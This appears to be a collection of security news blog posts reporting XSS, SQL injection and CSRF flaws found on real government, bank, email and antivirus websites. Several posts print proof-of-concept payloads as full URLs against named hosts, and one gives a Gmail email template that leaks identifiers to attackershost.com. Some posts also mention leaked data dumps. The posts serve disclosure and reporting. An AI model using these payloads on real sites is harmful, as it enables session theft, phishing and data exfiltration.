U.S Department of Transportation vulnerable to CSRF,SQLi and XSS

wiki boat brazil

The Hacker group called as 'The Wiki Boat Brazil' has discovered three critical vulnerabilities in the official websites of U.S Department of Transportation(dot.gov).

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request to the server. 

The site found to be vulnerable to Cross-site request forgery(CSRF) attack. The hackers provided us the POC for the CSRF attack. This vulnerability allows attackers CSRF to change user to admin , if admin user click the specially-crafted link .

They've also discovered SQL Injection vulnerability in the ITS Deployment Statistics sub domain of U.S. Department of Transportation (www.itsdeployment.its.dot.gov).

Environmental Review Toolkit page(www.environment.fhwa.dot.gov) vulnerable to Non-persistent Cross site scripting(XSS) attack.

They've also leaked some data compromised from Federal Highway Administration(www.fhwa.dot.gov).

Few days back, they have attacked the  Ministry of Finance and Federal Police sites in Brazil.

The details can be found here:
http://thewikiboatbrazil.com.br/DOT

XSS vulnerabilities has been fixed in Firefox 16.0.2

Mozilla has released updated versions of Firefox, Thunderbird, SeaMonkey that close three critical vulnerabilities related to the Location object .

Vulnerability details:
CVE-2012-4194:
The vulnerability allows attacker to use the valueOf method combined with some plugins to perform a XSS attack on users.

CVE-2012-4195:
CheckURL function in window.location can be forced to return the wrong calling document and principal, results in XSS attack

CVE-2012-4196
Allow an outsider to bypass security wrapper protections on the Location object, allowing the cross-origin reading of the Location object

The vulnerabilities has been fixed in Firefox 16.0.2, Firefox ESR 10.0.10, Thunderbird 16.0.2, Thunderbird ESR 10.0.10 and SeaMonkey 2.13.2.

Persistent XSS Vulnerability in 160By2


Hi, I've discovered a persistent cross site scripting vulnerability in 160by2 website, a popular site used for sending SMS.

Today, while i'm sending message to one of my friend from 160by2, My Hacker mind started to work (after long time).  I insert a script instead of message. Successfully , the message has been sent to the receiver.

 The inserted script:
     <script>alert("BreakTheSec")</script>


At the same time, 160by2 displayed the message send by me in the Sent Box.  Yeah, inserted-script is being executed and displayed the popup. 

Whenever i visit the Sent box, the popup is being displayed. In fact, the popup is being displayed in the main page also because of "LAST 5 MESSAGES SUMMARY" section in the home page.

I consider the risk level of this vulnerability as very very low because it only work when you logged in.  So, it won't help attackers to target victims.

XSS vulnerability found in Google "Translate foreign language" feature


A Security Researcher with handle "PandaSec" , have discovered Cross Site Scripting (XSS) vulnerability in the Google.

The "Translate foreign language" feature found to be vulnerable to Non-persistent xss attack.

The Researcher test the vulnerability in Firefox 14.0 , successfully exploit the vulnerability.  According to researcher statement, the older version's were not affected.


He immediately reported to google about the vulnerability. The Google has replied with the following message "Congratulations! This vulnerability is eligible for a reward of $500."

The vulnerability has been fixed now. 

StumbleUpon vulnerable to Reflected Cross site scripting


A security researcher, Rafay Baloch, has discovered Cross site scripting vulnerability in the StumbleUpon , One of the famous social bookmarking website with alexa rank of 149.

"Few days before, while i was hunting for vulnerabilities inside stumbleupon.com," Rafay said in his blog post. "Fiddler helped me obtain a non persistent XSS vulnerability inside stumbleupon"

He send notification about the vulnerability to StumbleUpon, however there is no response from other side.

"For security reasons i cannot disclose the URL and parameters for the injection, I hope stumbleupon fixes the vulnerability pretty soon." researcher said.

At the time of writing, the vulnerability is not patched and we are able to exploit the vulnerability.  In fact, i inject a redirection code that successfully redirects me to the given url.  So , an attacker can exploit this vulnerability for launching social engineering attack and redirect user to malicious site. Also it is possible to hijack session that allows attacker to take control of your stumble upon account.

Few days back, Rafay also discovered a redirection vulnerability in Facebook. 

Reflected XSS vulnerability in Abdul Kalam's Website


A Security Researcher from India, Girish Shrimali has discovered Cross site scripting vulnerability in the official website of an Indian scientist and administrator who served as the 11th President of India, A. P. J. Abdul Kalam.

The discovered XSS vulnerability is Reflected type, means non-persistent vulnerability and exploited via crafted url.

Normally, The Reflected  XSS are considered as low risk. Even thought the risk level is estimated as low, the attackers can redirect users to phishing or any other malicious sites.

POC:
http://www.abdulkalam.com/kalam/jsp/display_hints.jsp?menuid=22&menuname=%3Cscript%3Ealert%28%27XSS+found+by+Girish+Shrimali%27%29%3B%3C%2Fscript%3E&starts=0&ends=0



SQL Injection and XSS vulnerability in Navy.mil



A grey-hat hacker has discovered Critical SQL injection and cross site scripting vulnerability in the official website of The U.S. Navy (navy.mil).

"Recently I was pentesting one of navy.mil subdomains and found serious sql injection that allowed me to extract sensitive data from website database.Sql injection is located in post parameters of a form value.Attacker just needs to craft valid query and submit it to the server." the hacker wrote in an email.


SQLi vulnerability

He also discovered two xss vulnerabillites located on same subdomain , one is post xss and other is get xss , both reflective

"I have reported this to website security and I hope it will be resolved soon.After the fix I will disclose link locations on my blog http://m4x0n3.blogspot.com/." hacker said.

"Never trust user input." The hacker said as message to webmasters.

XSS vulnerability found in MasterCard site by nullcrew

The well-known hacker group NullCrew has discovered a non-persistent Cross Site scripting(XSS) vulnerability in official website of MasterCard. The subdomain "Mobile Payments Readiness(mobilereadiness.mastercard.com) found to be vulnerable to XSS attack.

http://mobilereadiness.mastercard.com/country-comparisons/index.php?c1=sg"><script>alert("NullCrew")</script>

Usually , the Non-persistent or reflected XSS are considered as low risk.  Even thought the risk level is estimated as low, the attackers can steal user accounts by social engineering attack.
 
For instance , A hacker can redirect victim to malicious or phishing sites by injecting redirection script in the url.  I have tested the redirection script,Successfully it redirects me to another site.

The above script redirects to google. An attacker can send the crafted-link and lure users into believe they are visiting legitimate master card site. But, in fact, they are being redirected to malicious site. 


NullCrew has also discovered XSS vulnerability on the Department of Homeland Security.

Tumblr patched the critical Persistent XSS vulnerability


A Security researcher, Riyaz Ahemed Walikar, has posted evidence of a serious persistent Cross Site Scripting(XSS) vulnerability on Tumblr, the popular microblogging platform.

XSS flaws are highly common on websites these days, but most of them are non-persistent and implicitly less dangerous.

"XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer," Researcher said in the blog post.

"Stored XSS is even more dangerous since the script is stored on the server and is executed everytime user visits an infected page."

Researcher found vulnerability  on the 'Register Application' page at http://www.tumblr.com/oauth/apps. The application was not sanitizing user input when a user would create a new application. An XSS attack vector like tester "><img src='x' onerror="alert(document.cookie)"/> would trigger an alert box, displaying the user's cookie, in the browser.

Tumblr were notified more than three weeks ago on the issue. Finally, they fixed the vulnerability Today(july 14).

If you don't know what XSS is, you can read this article "Xss For Beginners".

XSS vulnerability found in Microsoft.com

A security Researcher , Gambit, has discovered Cross site scripting vulnerability in Microsoft official website.

He found the vulnerability last month and reported the vulnerabilities to the Microsoft.

"Well last month I was looking around on MSN.com and Microsoft.com I found two XSS vulnerabilities, one in each domain.  I reported the vulnerabilities to the Microsoft security team and secured a spot on their acknowledgments page."Gambit said in his blog.


Microsoft listed his name in the 'Security Researcher Acknowledgments for Microsoft Online Services' page.

'asia.perf.glbdns.microsoft.com' page is vulnerable to XSS.  Researcher managed to execute the XSS code in the page.


POC: "asia.perf.glbdns.microsoft.com/files/top.php?domain=<script>alert(/Gambit/)</script>"

Google patched Persistent XSS vulnerabilities in Gmail


A security Researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google before few moths, Google patched the vulnerabilities now.

According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view" :

A incoming mail containing <img src=x onerror=prompt(1)> within the subject and forwarded to another user, has lead to XSS.

The second one is very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/ mu/#cv/search/%22%3E%3Cimg% 20src%3Dx%20onerror%3Dalert(2) %3E/foobar

The third security issue is very intersting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.

When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.

"An attacker doesn't know the ik and the message id . Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.

We have to send to our victim a HTML e-mail with that content:
<img src=" https://attackershost.com/1x1.gif " >
<a href=" https://attackershost.com/gmailxss ">Click here to have fun</a>
<script>alert(/xss/)</script>
When the user opens the email message, the GIF image will send the user ID and message ID to theattacker's server. The second URL also will leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code runningin the context of Gmail.

XSS Vulnerability found in 4 Antivirus websites



A Security Researcher Ankit Sharma has discovered Cross Site scripting vulnerability in four Antivirus websites.

The official websites belong to BitDefender , AVG, Avira and Total Defense Antivirus are vulnerable to xss.



In BitDefender TrafficLight , the URL input is not filtering the XSS. The Url input allows hackers to run malicious xss code. It can results in phishing attacks.

POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E



xss vulnerability found in more than 120 sites

Indian hacker Akshay discovered XSS vulnerability in more than 100 websites and listed the POC in tinypaste.

The vulnerable sites includes IndiaTimes,wikia.com, seagate, placementindia. After analyzing the paste, most of the sites are subdomain of wikia website.

Some other sites that are vulnerable to xss attack are dialabook.in, junglee.com, antya.com,t3.com,independent.co.uk

In past, he found xss vulnerability in lot of high profile sites.

http://pastebin.com/tLXTZDvP

JustDail,In.Com, rediff, Ebay and other sites vulnerable to xss


A hacker call himself as "5p1K3 BO7" found Cross site scripting vulnerability in some high profile sites. The list of vulnerable sites includes Airtel, Ebay, Jusdial ,rediff and NavBharatTimes .

Also he found xss vulnerability in the following sites: rovio.com ,moneycontrol.com,In.Com,Reliance site,m.mytatasky.com ,dinaralert.webs.com and domestichotels.yatra.com.

XSS vulnerability found in 60 high profile sites by Akshay AKA 0z0n3

Akshay AKA 0z0n3 have discovered Cross-site-scripting vulnerability in around 60 high profile websites.

The list of vulnerable sites with screenshot:
http://www.ipchecking.com - snap - http://4.bp.blogspot.com/-sXxLSZjS-YA/T3r6jzFEJxI/AAAAAAAAAQU/9KO2PSZjVNA/s640/ipchecking.PNG

2.http://www.hostip.info/ - snap - http://2.bp.blogspot.com/-1frOtWxbyWQ/T3rm4InsqxI/AAAAAAAAAQM/CC2oPWpAwUA/s640/host.PNG

3.http://buzzr.in/ - snap - http://4.bp.blogspot.com/-RrW1-tkGoYI/T3me0_BFAuI/AAAAAAAAAP0/-BPrIYpJNd0/s640/buzzer.in.PNG

4.http://www.jabong.com/ - snap - http://2.bp.blogspot.com/-h-NRz0x9r8U/T3meRO0ttjI/AAAAAAAAAPs/lsfHV7E6hFQ/s640/jabong.PNG

5.http://www.infibeam.com/ - snap - http://1.bp.blogspot.com/-XzpThsTvM1o/T3mc184ZwBI/AAAAAAAAAPc/lDcc4ICW8Z0/s640/infi.PNG

6.http://govasool.com/ - snap - http://4.bp.blogspot.com/-IhPt_piUZNE/T3mcGznGWFI/AAAAAAAAAPU/_cUNqu51qJI/s640/govasool.PNG

7.http://www.bestpricebid.com/ - snap - http://4.bp.blogspot.com/-sRLF50gx5qo/T3mbjos3_WI/AAAAAAAAAPM/eRCuvlO_hSc/s640/bestpricebid.PNG

8.discovery.com by - snap - http://3.bp.blogspot.com/-LuPNagueW-4/T3hUApqubkI/AAAAAAAAAOs/B13FADXhFv8/s640/Capture.PNG

9.pocketgamer.co.uk - snap - http://4.bp.blogspot.com/--7LLdA1-QeU/T3hNmJ4sPFI/AAAAAAAAAOg/NRqr8fgUwsE/s640/povket+gamer.PNG

10.zdnet.com - snap -http://4.bp.blogspot.com/-L2EztX0qh7w/T3g3DlxXMtI/AAAAAAAAAOM/qMaWRUmF0zY/s640/zdnet.PNG
patched

11.1up.com - snap - http://imgur.com/uc5y3

12.astrologer.rediff.com - snap - http://i49.tinypic.com/2q8pzqa.png

13.LIC - http://i45.tinypic.com/hx3ek3.png

14.http://warebuzz.com - http://1.bp.blogspot.com/-0rrctaNpS1g/T3gKU52H9sI/AAAAAAAAAN0/NgEEHOy1JJo/s640/ware+buzz.PNG

15.http://www.thedownloadplanet.com - http://2.bp.blogspot.com/-A90-Cs4O2Ow/T3gJY0PwYTI/AAAAAAAAANs/X3YRb8l_-8E/s640/download+planet.PNG

16.http://md5-decrypter.com - http://1.bp.blogspot.com/-wYTXo9rjxdI/T3brfaNUrdI/AAAAAAAAANc/aHu9oAVN4uo/s640/md5-decrypter.PNG

17.http://www.shiksha.com - http://3.bp.blogspot.com/-DE8esm6LDi0/T3bhpjsEExI/AAAAAAAAANU/ooJCO2CIur8/s640/shiksha.PNG

18.http://www.scholastic.com - http://1.bp.blogspot.com/-sFeKT9dyi5A/T3W-JAsfTII/AAAAAAAAANM/zLYTpg_zAZ4/s640/scholastic.PNG

19.http://www.indiatrace.com - http://4.bp.blogspot.com/-Pdkg39UIVLQ/T3W1bF-LK7I/AAAAAAAAANE/O1Lp-3oEndA/s640/Capture.PNG

20.http://www.americanregistry.com - http://1.bp.blogspot.com/-hs2fIRZsgAI/T3VpB4S9wnI/AAAAAAAAAMs/E0lBuFawamc/s640/american.PNG

21.http://www.stockpricetoday.com - http://4.bp.blogspot.com/-drwR5vn2yuY/T3VoHExfzEI/AAAAAAAAAMk/6NRzeUEHMGY/s640/stock+price.PNG

22.http://www.trdefence.com - http://4.bp.blogspot.com/-DDNU3wRnS-k/T3VmNQAmvwI/AAAAAAAAAMc/Pa1-0gAKWa4/s640/turkey+defense.PNG

23.http://industry.net/ - http://1.bp.blogspot.com/-jz5Qprco2l8/T3ViZ8auwDI/AAAAAAAAAMM/fbSHyu34DyM/s640/industry.net.PNG

24.http://www.bdtradeinfo.com - http://4.bp.blogspot.com/-ssrm58lR7Y0/T3SGg5pyVxI/AAAAAAAAALk/PSQdV4_9YQE/s640/bdtradeinfo.PNG

25.dealsandyou.com - http://1.bp.blogspot.com/-PmgIo4Inb8g/T3MTmGEheBI/AAAAAAAAALM/HwKAWSXRMAg/s640/deals+and+you.PNG

26.100bestbuy.com - http://2.bp.blogspot.com/-VpZiQkWQH2Y/T3MSwjfKElI/AAAAAAAAALE/y30pSYfrwrQ/s640/100+best+buy.PNG

27.chennai.burrp.com - http://4.bp.blogspot.com/-YRKuTsUhN6U/T3LrzpQZ2jI/AAAAAAAAAKg/5Gi2Ww225J4/s640/burrp+2.PNG

28.bangalore.burrp.com - http://2.bp.blogspot.com/-Wo3a1kI29ZI/T3LqgRre7jI/AAAAAAAAAKY/V0QsT2s60I4/s640/burp+banglore.PNG

29.http://www.proxysites.com - http://3.bp.blogspot.com/-yiJQdIQI8nw/T3Lp-Drl-KI/AAAAAAAAAKQ/-QzKBTpXAp4/s640/proxy+site.PNG

30.http://vertor.com - http://3.bp.blogspot.com/-AGl5bbo-d3M/T3HhwS0GX2I/AAAAAAAAAKI/OvrpwMYYlMQ/s640/vertor.PNG

31.https://torrentprivacy.com - http://2.bp.blogspot.com/-Ksa-FQtAiXg/T3HgB10v5_I/AAAAAAAAAKA/4RBWC1tYO-k/s640/privacy.PNG

32.www.yifytorrents.com - http://2.bp.blogspot.com/-KPCn5bldif8/T3HWLfWyUPI/AAAAAAAAAJw/2zDLbbttZAY/s640/yify.PNG

33.saavn.com - http://4.bp.blogspot.com/-N1Yvg1yR4BU/T3HI_zKr9zI/AAAAAAAAAJg/IJgRFT2wMHw/s640/saa.PNG

34.www.arabianbusiness.com - http://2.bp.blogspot.com/-ngUEyIWkd7Q/T3GvlQ0sjmI/AAAAAAAAAJY/ZrLBull5om8/s640/arabian.PNG

35.velocity.discovery.com - http://4.bp.blogspot.com/-3vFAtzIfnoA/T3GqX6mj0II/AAAAAAAAAJQ/AXLIAQ6ss_c/s640/velocity.PNG

36.science.discovery.com - http://1.bp.blogspot.com/-ygi6RWwm4r8/T3GqI1LSJyI/AAAAAAAAAJI/A_NvDMps6nw/s640/science.+disco.PNG

37.planetgreen.discovery.com - http://1.bp.blogspot.com/-CuI8fyW1JGQ/T3Gp335-xtI/AAAAAAAAAJA/rKMVzco1IBM/s640/planet+green.PNG

38.investigation.discovery.com - http://4.bp.blogspot.com/-qnWsvSYY8YQ/T3GpdqVeU-I/AAAAAAAAAI4/_9QxkpUTLho/s640/investigation+disco.PNG

39.health.discovery.com - http://4.bp.blogspot.com/-p0wnXa1elEA/T3GpB0aBk7I/AAAAAAAAAIw/a9ZhyEQu4Yc/s640/health+disco.PNG

40.animal.discovery.com - http://4.bp.blogspot.com/-1Hzcu--hP_s/T3GosmdYnvI/AAAAAAAAAIo/Z3KmcFmyw4Y/s640/animal+planet.PNG

41.brothersoft.com - http://4.bp.blogspot.com/-M9esX8gICt0/T3GbKJ-z5kI/AAAAAAAAAIY/DMm0KQEVJwI/s640/brother+soft.PNG

42.http://www.emp3world.com - http://1.bp.blogspot.com/-V8S_UBtNMbw/T3GO2V0qTHI/AAAAAAAAAIM/k-1CIzVcOps/s640/emp3.PNG

43.www.malabargold.com - http://1.bp.blogspot.com/-dMap3sAvV5o/T3B8aHgBKdI/AAAAAAAAAHw/7IzjV4PL144/s640/malabar.PNG

44.www.tanishq.com - http://3.bp.blogspot.com/-EDfBzzJz8iQ/T3B7_16FClI/AAAAAAAAAHo/7W3OBxylZd4/s640/tanishq.PNG

45.http://www.ecb.co.uk - http://3.bp.blogspot.com/-ouWqcIl-6as/T3BwabPqpjI/AAAAAAAAAHg/GDSXL9brJ4c/s640/british.PNG

46.http://www.premierleague.com - http://4.bp.blogspot.com/-7bPcLU0GHw4/T3BrJKI_FLI/AAAAAAAAAHQ/VWVYLw0Nmj0/s640/premier.PNG

47.http://www.cricket.com.au - http://1.bp.blogspot.com/-YmGHDgXCq3M/T3BuAVdhJ5I/AAAAAAAAAHY/kX1_YFZ4VCU/s640/kabarroo.PNG

48.http://www.rapidsharedata.com - http://2.bp.blogspot.com/-mJPoTJVcMic/T3Boa6CFxKI/AAAAAAAAAHI/uPfCqNLo8Qk/s640/rapidshare.PNG

49.www.whatsmyip.com - http://2.bp.blogspot.com/-GzjF_oq33w4/T3A1jMzlRVI/AAAAAAAAAGY/50ntkVG3xos/s640/whatsmy+ip.PNG

50.http://eztv.it - http://4.bp.blogspot.com/-JgMf3qZ9kRo/T27Gi34a61I/AAAAAAAAAFo/9JyXqalNmEM/s640/eztv.PNG

51.http://www.indiaplaza.com - http://2.bp.blogspot.com/-K6izMAgd_ik/T3AcfP2oDpI/AAAAAAAAAGA/yDY-RE8kGW8/s640/india+plaza.PNG

52.asiagamespot.com - http://1.bp.blogspot.com/-cToR0vSQ09Q/T29DkeFu6_I/AAAAAAAAAF4/OLUP0y-jUms/s640/gamespot.PNG

53.http://dunyanews.tv - http://1.bp.blogspot.com/-OouHLv17uwU/T262ogNVDZI/AAAAAAAAAFg/FkVc83KjMp0/s640/pk+news.PNG

54.http://thetwilightsaga.com - http://1.bp.blogspot.com/-5xQCtPSXvQs/T230n1BvqPI/AAAAAAAAAFY/DykhfJN-03I/s640/twilight.PNG

55.https://secure.wsj-asia.com - http://1.bp.blogspot.com/-YfbSmQUp4VQ/T23gKloKEKI/AAAAAAAAAFQ/K-hecZghSEU/s640/wallstreet.PNG

56.expedia.co.in - http://1.bp.blogspot.com/-FIyU9Zz7ik4/T23TB3x7NzI/AAAAAAAAAE8/1l5awVK2HjQ/s640/expedia.PNG

57.http://www.indiainfoline.com - http://2.bp.blogspot.com/-dnZtvmIk44M/T23Qykr8zVI/AAAAAAAAAE0/HuQM6Q1ULfY/s640/iifl.PNG

58.http://www.palestinechronicle.com - http://3.bp.blogspot.com/-iJjcuBwsbqs/T22dno4ma7I/AAAAAAAAAEM/zKOReV8JlQY/s640/Caapture.PNG

59.http://thesims2.ea.com - http://4.bp.blogspot.com/-qPQRpgXJLsI/T2yoEKsYiGI/AAAAAAAAAD4/QQRoOHrs8Ek/s640/C+apture.PNG

60.olx.in - http://3.bp.blogspot.com/-fpt0DzwwZKA/T22-M-6T2nI/AAAAAAAAAEk/PQkFW91TsO4/s640/olx.PNG

Akshay AKA 0z0n3 claims he found xss vulnerability in blogspot


Akshay AKA 0z0n3 claimed that he have discovered a Persistent XSS vulnerability in blogspot.com.  He managed to inject the xss vector in his own blogger dashboard. He is sure it is not template page(usually templates allow bloggers to inject scripts ). 

He used one of the following xss vector:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

After injecting, he didn't get a pop-up but after some minutes he started getting pop-ups. He reported about the vulnerability to Google Security team. The vulnerability is not rewarded by Google.


"Thank you for your note. We took a look at the XSS issue you reported. Unfortunatley, the XSS issues is executing on the blogspot domain and not blogger.com. We come some of these scenarios here.

http://www.google.com/about/company/rewardprogram.html#javascript-blogger

Unfortunately, XSS issues on blogspot(as opposed to blogger.com) do not quailfy for the VRP.  If you manage to execute this javascript on someone else's blog or on the blogger.com domain, that would qualify for a reward." Google response mail.

XSS vulnerability found in Russian Biggest social Network odnoklassniki.ru

GreyHat Hackers Sony and Flexxpoint come with interesting xss found, discovered cross site scripting vulnerability in Odnoklassniki.  Odnoklassniki (Одноклассники in Russian, Classmates) is a social network service for classmates and old friends reunion popular in Russia and other former Soviet Republics. It was created by Albert Popkov on March 4, 2006.

He provided the vulnerable link and video to demonstrate the vulnerability:

http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E

Screenshot
In order to verify the vulnerability, we have to login because the page is available only for logged in users.

POC video:




Cross Site Scripting vulnerability found in Radikal.ru

Grey Hat hacker "Sony" has discovered Cross site scripting(XSS) vulnerability in Radikal.ru.  Radikal.ru is one of Russia's largest image hosting service that allows you to quickly publish photos on the various chat rooms, message boards, blogs and online forums.

He found XSS vulnerability in multiple pages.

Here is one of the vulnerable link:

http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E&id_gallery=-1

Screenshot

In order to see other vulnerability, you have to login into the website. The vulnerability resides in Edit pics,etc.

XSS Vulnerability in Amazon website ,found by Fabian Cuchietti

Security Researcher, Fabian Cuchietti discovered XSS vulnerability in the Amazon Web Services(aws.amazon.com).

POC:
https://aws.amazon.com/amis?ami_provider_id=4&architecture='%22--%3E%3C/style%3E%3C/script%3E%3Cscri
pt%3Ealert(0x015E00)%3C/script%3E&selection=ami_provider_id%2Barchitecture

It seems that the vulnerability has been fixed by vendor, the admin managed to filter html codes by converting to html special characters. Anyway we are able to retrieve the mirror of the vulnerability from XSSed.com. 

Mirror is available here:
http://www.xssed.com/mirror/77551/

Screenshot of the vulnerability

TeamDigi7al found Vulnerability in NASA, vatican.va,weather.com


A Hacker group TeamHav0k reformed and made a new group called "TeamDigi7al".  The Hacker group become active now and exposed vulnerabilities in some high profile sites.

Hackers exposed the XSS vulnerabilities in NASA(careerlaunch.jpl.nasa.gov) , Vatican.va and weather.com. Hackers found SQL injection vulnerability in LoC(webarchive.loc.gov) and LFI vulnerability in Humboldt State University (humboldt.edu).

Hackers also hacked and dumped the Bolivian Ambassadors inbox. They upload a 62MB sized RAR file(Emails.rar) in uppit.com.